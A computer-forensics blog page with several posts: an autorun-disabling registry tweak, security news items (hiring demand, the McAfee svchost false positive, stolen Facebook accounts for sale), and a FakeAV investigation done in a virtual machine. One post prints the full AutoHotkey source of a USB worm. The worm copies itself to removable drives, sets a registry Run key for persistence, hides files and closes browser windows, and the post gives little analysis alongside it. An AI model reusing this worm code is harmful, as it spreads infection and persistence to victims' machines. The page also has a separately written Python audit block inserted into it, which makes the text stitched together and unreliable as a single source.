Computer Forensics

Data Acquired and Frozen

Browsing Posts published by Sriram

One of the easiest ways to get your computer infected is by sharing an actively infected pen drive or memory stick. When you insert a memory stick or a CD, Windows looks for a file called “autorun.inf” in the device’s root directory. If it is found, Windows tries to execute what it specifies. Malware can easily create this file and use it to replicate. The Windows registry holds the setting that decides whether autorun.inf is read or not. To change the setting,

save the following content in a .reg file and run it.

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095

Now, after adding this entry to the registry, Windows no longer checks for autorun.inf when you insert a device. However, if you double-click the drive letter in “My Computer”, the “autorun.inf” still executes.


The AHK worm consists of 3 script files along with the AHK compiler executable, consolidated into one archive named svchost.exe.

1. Contents of reproduce.txt

#notrayicon
#persistent
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
return
reproduce:
Loop %ArrayCount%
{
element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{
FileCopydir,C:\heap41a\offspring,%element%:\,1
}
}
}
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
return

This script makes sure that the registry entry and the files stay intact and that every removable drive letter gets infected.

2. Contents of script.txt

#persistent
#notrayicon
settimer,ban,2000
return
ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE...,30
return
}
ifwinactive ahk_class IEFrame
{
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
}
return

3. Contents of “std.txt”

#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0

Contents of stdoriginal.txt

#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt

4. Contents of “drivelist.txt”

c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
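The registry side of the two posts above, as an added example that is not part of the original page: a small Python audit that parses a .reg export offline, decodes the NoDriveTypeAutoRun mask from the first post, and flags the policies\Explorer\Run persistence and the SHOWALL tamper that reproduce.txt and std.txt write. The key paths and the C:\heap41a location come from the page; the parser, the drive-type bit table and the sample export are my own (the sample is constructed, not a real capture).

```python
# Added example (not from the original post): parse a Windows .reg export
# offline and audit it for the NoDriveTypeAutoRun bitmask and for the
# registry traces the heap41a worm scripts above leave under HKLM.
import re

# Each set bit disables autorun for one drive type. 0x91 was the old Windows
# default; the page's 0x95 adds removable drives; 0xFF covers every type.
DRIVE_BITS = {0x01: "unknown", 0x02: "no_root_dir", 0x04: "removable", 0x08: "fixed",
              0x10: "remote", 0x20: "cdrom", 0x40: "ramdisk", 0x80: "reserved"}
DEFAULT_MASK = 0x91
AUTORUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
WORM_RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run"
SHOWALL_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"

def parse_reg(text):
    # Minimal parser for "Windows Registry Editor Version 5.00" exports. Key paths
    # and value names are lower-cased (the registry is case-insensitive) and the
    # .reg "\\" escaping inside string values is undone.
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1).lower()
            keys.setdefault(current, {})
        elif current is not None and "=" in line:
            name, _, value = line.partition("=")
            value = value.strip().strip('"').replace("\\\\", "\\")
            keys[current][name.strip().strip('"').lower()] = value
    return keys

def autorun_status(keys):
    # Map each drive type to True when autorun is disabled for it.
    raw = keys.get(AUTORUN_KEY.lower(), {}).get("nodrivetypeautorun", "")
    mask = int(raw[6:], 16) if raw.startswith("dword:") else DEFAULT_MASK
    return {name: bool(mask & bit) for bit, name in DRIVE_BITS.items()}

def find_worm_indicators(keys):
    # Persistence via policies\Explorer\Run (reproduce.txt) and the SHOWALL
    # CheckedValue=0 tamper (std.txt) that breaks the "show hidden files" option.
    findings = []
    for name, cmd in keys.get(WORM_RUN_KEY.lower(), {}).items():
        tag = "matches heap41a sample" if "heap41a" in cmd.lower() else "review"
        findings.append(f"Explorer\\Run: {name} -> {cmd} ({tag})")
    checked = keys.get(SHOWALL_KEY.lower(), {}).get("checkedvalue", "dword:00000001")
    if checked == "dword:00000000":
        findings.append("SHOWALL CheckedValue=0: hidden-file view disabled")
    return findings

# Constructed sample export (not a real capture) showing both conditions.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"winlogon"="C:\\heap41a\\svchost.exe C:\\heap41a\\std.txt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000000
'''
```

Note that with the page's 0x95 the decoder still reports CD-ROM and fixed-drive autorun as enabled; 0xFF disables autorun for every drive type.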


As corporations across the country have come to understand the nature of today’s fast-evolving cyberthreat landscape, many of them are now asking themselves the same question: What kind of security team does an organization need?

The modest recoveries in the economy and the painful security lessons of last year – like the theft of millions of credit card details or valuable intellectual property in single, calculated heists – have prompted companies of all sizes and in every sector to rethink their hiring priorities and step up their recruiting in cyber-security.
According to data from employment market information firm Wanted Technologies, cyber-security job openings across the country went up from 32,000 to 40,000 in the first three months of the year, a 25 percent increase.
“We’ve had the busiest quarter we’ve had in a number of years,” said Joyce Brocaglia, chief executive officer of information security recruitment firm Alta Associates. “We probably have a 50 percent-plus increase in the number of companies that are coming to us with security positions this year compared to the same period last year. It’s huge.”

Need increases

“The economy has been so poor in the last couple of years that companies working with skeleton crews and limited resources are at a point where they can’t continue handling risk management if they’re constantly understaffed,” he said. As a result, firms across all sectors – from e-commerce, financial services and health care to online gaming and government contractors – are thinking more about who’s handling their security.

Specialized skills

But finding the right people is not necessarily an easy job, because companies are looking for very specific skill sets in candidates, and those specialists are in short supply. Recruiters said their clients are mainly looking for people with experience in identity and access management and cloud computing. Alan Paller, director of research at the cyber-security training group SANS Institute, said organizations with large stakes in protecting against attacks are looking for skills necessary to detect evidence of attacks, such as forensics and reverse engineering.
For instance, Google, which is already praised in the security community for its strong team of experts, has advertised more than a dozen security positions on its job Web site and LinkedIn for several weeks. “Looking for high-quality security talent is always a focus of ours, but … we do have quite a few openings right now,” Google spokesman Jay Nancarrow said in an e-mail. “We definitely would like to grow our team to help us with a variety of important and challenging opportunities.”

Take your pick of jobs

Two renowned security researchers who asked to remain anonymous said Google recruiters have approached them and several colleagues. One of them said he was strongly considering the offer. “I’ve had more recruiters talk to me in the last couple of months than in all (of) 2009,” said the other researcher. “It is definitely an employee’s market right now. If you’re a high-profile security researcher, you can pick whoever you want to work with and you should be able to get in.” After a profitable third quarter last year, Google chief executive officer Eric Schmidt said the worst of the recession was over and that the company’s top priority would be investing in new hires, particularly of engineers and sales personnel. However, it is unclear if the recent security openings preceded or are related to the December cyberattack that Google said originated in China and that the New York Times reported this week was intended to seize the source code of the company’s password system.

Posts at big firms

“Your assumption is that Google, of all companies, would be able to defend itself, and it couldn’t,” Paller said. “In the aftermath of the China mess, they found out that the tools that people thought would protect them fail to protect against these advanced threats.” Other Internet and technology giants like Amazon.com, eBay, Microsoft and Adobe Systems are also currently advertising dozens of security-related jobs on their Web sites. Brocaglia said having more people thinking about security also means more work for second-market organizations like security vendors and consultants that cater to small and medium businesses that need to outsource their security operations. “The world changed in the last couple of years, and the bad guys won. Now we need new security people to fill those gaps,” said Jeremiah Grossman, chief technology officer at Web application security firm WhiteHat, which is also hiring new personnel to meet the growing demand for its services.

Source: http://ow.ly/179VKD


Criminals have been keen to take advantage of the critical update bug that affected McAfee users in the past few days.

A false positive in McAfee’s detection of the “Wecorl.A” virus caused hundreds of thousands of computers around the world to reboot themselves repeatedly, as the antivirus software wrongly quarantined the critical Windows file “svchost.exe”.

To its credit, McAfee is discussing the problem on its online community forum, has apologized, withdrawn the buggy update, and advised customers on how to manually fix the affected computers.

But that hasn’t stopped blackhat SEO hackers from creating poisoned Web pages that appear high in the search rankings if you hunt for information on the McAfee false-positive.

McAfee false positive problem exploited by hackers

Clicking on one of these dangerous links can take you to a Website that harbors the FakeAV scareware (also known as fake or rogue antivirus) attack, designed to trick you into believing you have a serious security problem on your computer — and urging you to purchase or install other code from the hackers behind the scam.

If you have suffered from the false positive, then I suggest you visit only McAfee’s Website for advice — and not go clicking on unknown links.

Source: http://ow.ly/179UEO


A hacker who calls himself Kirllos on an underground forum is accused of being responsible for the theft of an unprecedented number of Facebook user accounts. Researchers from iDefense, a VeriSign company, recently discovered that the hacker was selling usernames and passwords obtained through hacking on a networking forum. What really drew attention was the amount of data the criminal had for sale: 1.5 million accounts, which would be roughly 1 in every 300 registered Facebook accounts.

VeriSign has not yet confirmed whether the accounts sold on the forum are legitimate, and Facebook has not commented on the situation. According to the statement, if the data are real then Kirllos holds the account information of about one in every 300 users of the social network. The hacker’s asking price ranges from $25 to $45 per thousand accounts, depending on the number of contacts each user has. According to VeriSign’s director of cyber intelligence, Rick Howard, the criminal appears to have sold about 700,000 accounts so far. “Hackers have sold the credentials of social networks for some time. We have seen an active trade in names and passwords for VKontakte in Russia, for example. But now the trend is to go after global targets such as Facebook,” says Howard. According to the security firm, “Facebook has more than 400 million users worldwide. In a typical attack, criminals send messages from a compromised account, telling friends that the owner is stuck in a foreign country and needs money to go home.”


On Wednesday (2010/04/21), millions of computers came to a dead halt when McAfee Antivirus falsely identified a normal Windows file (svchost.exe) as infected with the malware named “Wecorl.a”, causing machines to either crash or enter an endless shutdown – reboot cycle. This false positive affected Windows XP SP3 systems, disabling computers in schools and hospitals, and even halting production lines in some industries.

McAfee quickly swung into action, dedicating its staff of more than 7,000 to fixing the problem. False detections by antivirus software are something that cannot be accepted.

The company’s official response to the false positive issue, from the McAfee website, is as follows:

  • McAfee is aware that a number of customers have incurred a false positive error due to the release of the 5958 virus superdat definition file at 2:00 p.m. GMT+1 (6 a.m. PDT) on Wednesday, April 21.
  • Our initial investigation indicates that the error can result in moderate to significant issues on systems running Windows XP Service Pack 3. If you are one of those impacted, we understand that this is a significant event for you and we’re very sorry.
  • McAfee is taking every measure to prevent this from reoccurring.
  • McAfee employees are working with the highest priority to support impacted customers. We have released updated virus definition files that do not contain the problem (DAT 5959 and higher) and are providing customers with detailed guidance on how to repair impacted systems.

Hackers of course quickly jumped on the bandwagon, putting up websites and using SEO techniques that claimed to help you solve the problem but instead led straight to malicious links.


We use Google search for everything in our lives, from gardening to university study to keeping ourselves updated. How about a search for details on the recent Iceland volcanic activity leading to malware!! Dangerous, isn’t it!! But this does occasionally occur!! We need to be careful about the sites we visit from Google search results. Google is making every effort to keep bad results out of its search listings, but we still need to be careful.

This morning, while casually searching Google in my Opera browser for updates on the volcanic activity, I was led to a fantasy! A message box said “Warning! Your computer is at risk of malware attacks”. I was happy! I had caught a rogue, a Fake-Alert, and decided to investigate it. I moved the message box aside and found my browser minimized under it. I have attached the screenshot below, in Firefox!

The message box warned me that “Warning! Your system is at risk of malware attacks” and assured me it would help strengthen my system. I panicked. I agreed to its request by clicking OK. It then opened a Firefox window and started scanning my system. It even displayed my IP address and my system environment parameters.

After the scan completed, it started alerting me that my system had a lot of problems that needed to be fixed (see the screenshot below). The problems reported were: 1. registry to be fixed, 2. remove outdated temporary junk files, 3. hard disk defragmentation, 4. disk surface analysis, 5. webpage download speed.

I clicked the message box and it prompted me to download and save a file named “packupdate_build30_287.exe”, which I did. The hashes of the file are:

MD5:   9d44165fa043a2f9674055055233598e
SHA-1: f9e69be0459c57d187e786ff30a7609b2b6edcf0

Now I let the file execute. It started extracting.

After extracting, a system scan started.

Finally,

My system is infected now!! Panic at the extreme!! Wanting to fix it, I clicked on “remove all”. It was kind enough to open a window asking me to buy protection for 6 months ($65.00) or 1 year ($100.00).
Should I buy?

No, without any doubt. I know that I executed the file in a cleanly built WinXP SP2 virtual machine test environment in non-persistent mode, and there is no chance of it getting infected.
